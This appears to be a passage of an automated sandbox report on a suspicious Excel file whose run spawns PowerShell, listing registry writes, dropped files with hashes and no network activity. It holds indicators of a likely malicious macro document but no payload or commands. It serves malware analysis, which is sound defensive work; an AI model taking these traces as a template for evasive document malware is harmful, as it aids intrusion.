HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
{?8
7B3F38001C080000010000000000000000000000
2076
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
Off
2076
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
On
2076
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1040
On
2076
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTT
1C08000068BDED2958F3D40100000000
2076
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
2076
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
2076
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\FFDB1
FFDB1
040000001C0800004000000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C0044006F00630075006D0065006E0074006F005F003000350039003000320035005F00460054005F00320030003100390030003400310035005F0030003000300035003000300038005F002E0078006C007300000000001700000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C000100000000000000F0964A2A58F3D401B1FD0F00B1FD0F0000000000AC020000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
2076
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\FFDB1
FFDB1
040000001C0800004000000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C0044006F00630075006D0065006E0074006F005F003000350039003000320035005F00460054005F00320030003100390030003400310035005F0030003000300035003000300038005F002E0078006C007300000000001700000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C000100000000000000F0964A2A58F3D401B1FD0F00B1FD0F0000000000AC020000001800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
2076
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
EXCELFiles
1317994523
2076
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1317994646
2076
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
VBAFiles
1317994502
2076
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\FFDB1
FFDB1
040000001C0800004000000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C0044006F00630075006D0065006E0074006F005F003000350039003000320035005F00460054005F00320030003100390030003400310035005F0030003000300035003000300038005F002E0078006C007300000000001700000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C000100000000000000F0964A2A58F3D401B1FD0F00B1FD0F0000000000AC020000001800000400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
2076
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\FFFD4
FFFD4
040000001C0800004000000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C0044006F00630075006D0065006E0074006F005F003000350039003000320035005F00460054005F00320030003100390030003400310035005F0030003000300035003000300038005F002E0078006C007300000000001700000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C000100000001000000E08059EC57F3D401D4FF0F00D4FF0F0000000000AC0200006E0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
2076
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
25
2076
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Item 1
[F00000000][T01D4F3582A9E0E20][O00000000]*C:\Users\admin\Desktop\
2076
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\File MRU
Max Display
25
2076
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\File MRU
Item 1
[F00000000][T01D4F3582AA07F20][O00000000]*C:\Users\admin\Desktop\Documento_059025_FT_20190415_0005008_.xls
2076
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Licensing
538F6C892AD540068154C6670774E980
01000000270000007B39303134303030302D303033442D303030302D303030302D3030303030303046463143457D005A0000004F00660066006900630065002000310034002C0020004F0066006600690063006500500072006F00660065007300730069006F006E0061006C002D00520065007400610069006C002000650064006900740069006F006E000000
2076
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
LastPurgeTime
25921856
3368
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
LanguageList
en-US
3640
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
LanguageList
en-US

Files activity

Executable files
0
Suspicious files
6
Text files
10
Unknown types
6

Dropped files

PID
Process
Filename
Type
3640
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF10085e.TMP
binary
MD5: 131dc75f6d4142ca9244945a91a71e8d
SHA256: f17c463c77b5da9e795770a82e0a7fb1023023f44397f6e080721e9811b2a0c4
3564
EXCEL.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Documento_059025_FT_20190415_0005008_.xls.LNK
lnk
MD5: 4df007bfcad6ed429e64d4e9cc3665ae
SHA256: db7389025976db118e4ef6f8502721dfcbdbcf69e15a56fa99c380f795a61e92
3640
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WM900AV69H13QBRZ4C39.temp
––
MD5:  ––
SHA256:  ––
3368
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1004a5.TMP
binary
MD5: 131dc75f6d4142ca9244945a91a71e8d
SHA256: f17c463c77b5da9e795770a82e0a7fb1023023f44397f6e080721e9811b2a0c4
3368
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
binary
MD5: 131dc75f6d4142ca9244945a91a71e8d
SHA256: f17c463c77b5da9e795770a82e0a7fb1023023f44397f6e080721e9811b2a0c4
3368
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2BD6ZADV22E4EPU9K9MB.temp
––
MD5:  ––
SHA256:  ––
2076
EXCEL.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Documento_059025_FT_20190415_0005008_.xls.LNK
lnk
MD5: 6afda8f4e0eba8f5dc6821e2b0848318
SHA256: b24dae3ae9361f6f2242107133e1a81b012170729d7a9692e4798d94419fcfb9
2076
EXCEL.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
text
MD5: 0b6bfe8bd6d7a7979a425b0d82d1e961
SHA256: 658f91442ff863b7483a2783780d50db6b9f7e4f808f1d68ac6f39bfb7c8f0ed
2076
EXCEL.EXE
C:\Users\admin\AppData\Local\Temp\CVRFBDB.tmp.cvr
––
MD5:  ––
SHA256:  ––
3564
EXCEL.EXE
C:\Users\admin\AppData\Local\Temp\~DF57ECACFF1CD0B401.TMP
––
MD5:  ––
SHA256:  ––
3640
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
binary
MD5: 131dc75f6d4142ca9244945a91a71e8d
SHA256: f17c463c77b5da9e795770a82e0a7fb1023023f44397f6e080721e9811b2a0c4
3564
EXCEL.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
text
MD5: 0b6bfe8bd6d7a7979a425b0d82d1e961
SHA256: 658f91442ff863b7483a2783780d50db6b9f7e4f808f1d68ac6f39bfb7c8f0ed
3564
EXCEL.EXE
C:\Users\admin\Desktop\Documento_059025_FT_20190415_0005008_.xls
document
MD5: 934fd27a4a167667838ed235821b836f
SHA256: ee57443623cfdc7a7941756d97e9f2a4c78cb3ad0c6b54a88869f4d1a10933cb
3564
EXCEL.EXE
C:\Users\admin\AppData\Local\Temp\~DFD35FE8FEF69B95FD.TMP
––
MD5:  ––
SHA256:  ––
3564
EXCEL.EXE
C:\Users\admin\AppData\Local\Temp\CVRAB9D.tmp.cvr
––
MD5:  ––
SHA256:  ––
1160
EXCEL.EXE
C:\Users\admin\AppData\Local\Temp\~DFF7E69A827E3A94F0.TMP
––
MD5:  ––
SHA256:  ––
1160
EXCEL.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Documento_059025_FT_20190415_0005008_.xls.LNK
lnk
MD5: 4df007bfcad6ed429e64d4e9cc3665ae
SHA256: db7389025976db118e4ef6f8502721dfcbdbcf69e15a56fa99c380f795a61e92
1160
EXCEL.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
text
MD5: 0b6bfe8bd6d7a7979a425b0d82d1e961
SHA256: 658f91442ff863b7483a2783780d50db6b9f7e4f808f1d68ac6f39bfb7c8f0ed
1160
EXCEL.EXE
C:\Users\admin\Desktop\Documento_059025_FT_20190415_0005008_.xls
document
MD5: aab3f3faa98e4c8276038191aada4b77
SHA256: 5d1e9f1e8c37fe5cd5aca4f1d40c024af924bcbb429bb69a62f7dbb3b8921ee9
1160
EXCEL.EXE
C:\Users\admin\AppData\Local\Temp\~DFB1A46F0D4242B6F7.TMP
––
MD5:  ––
SHA256:  ––
1160
EXCEL.EXE
C:\Users\admin\AppData\Local\Temp\CVR6BA6.tmp.cvr
––
MD5:  ––
SHA256:  ––

Find more information of the staic content and download it at the full report

Network activity

HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
0
Threats
0

No network activity.

Debug output strings

Process Message
powershell.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
powershell.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144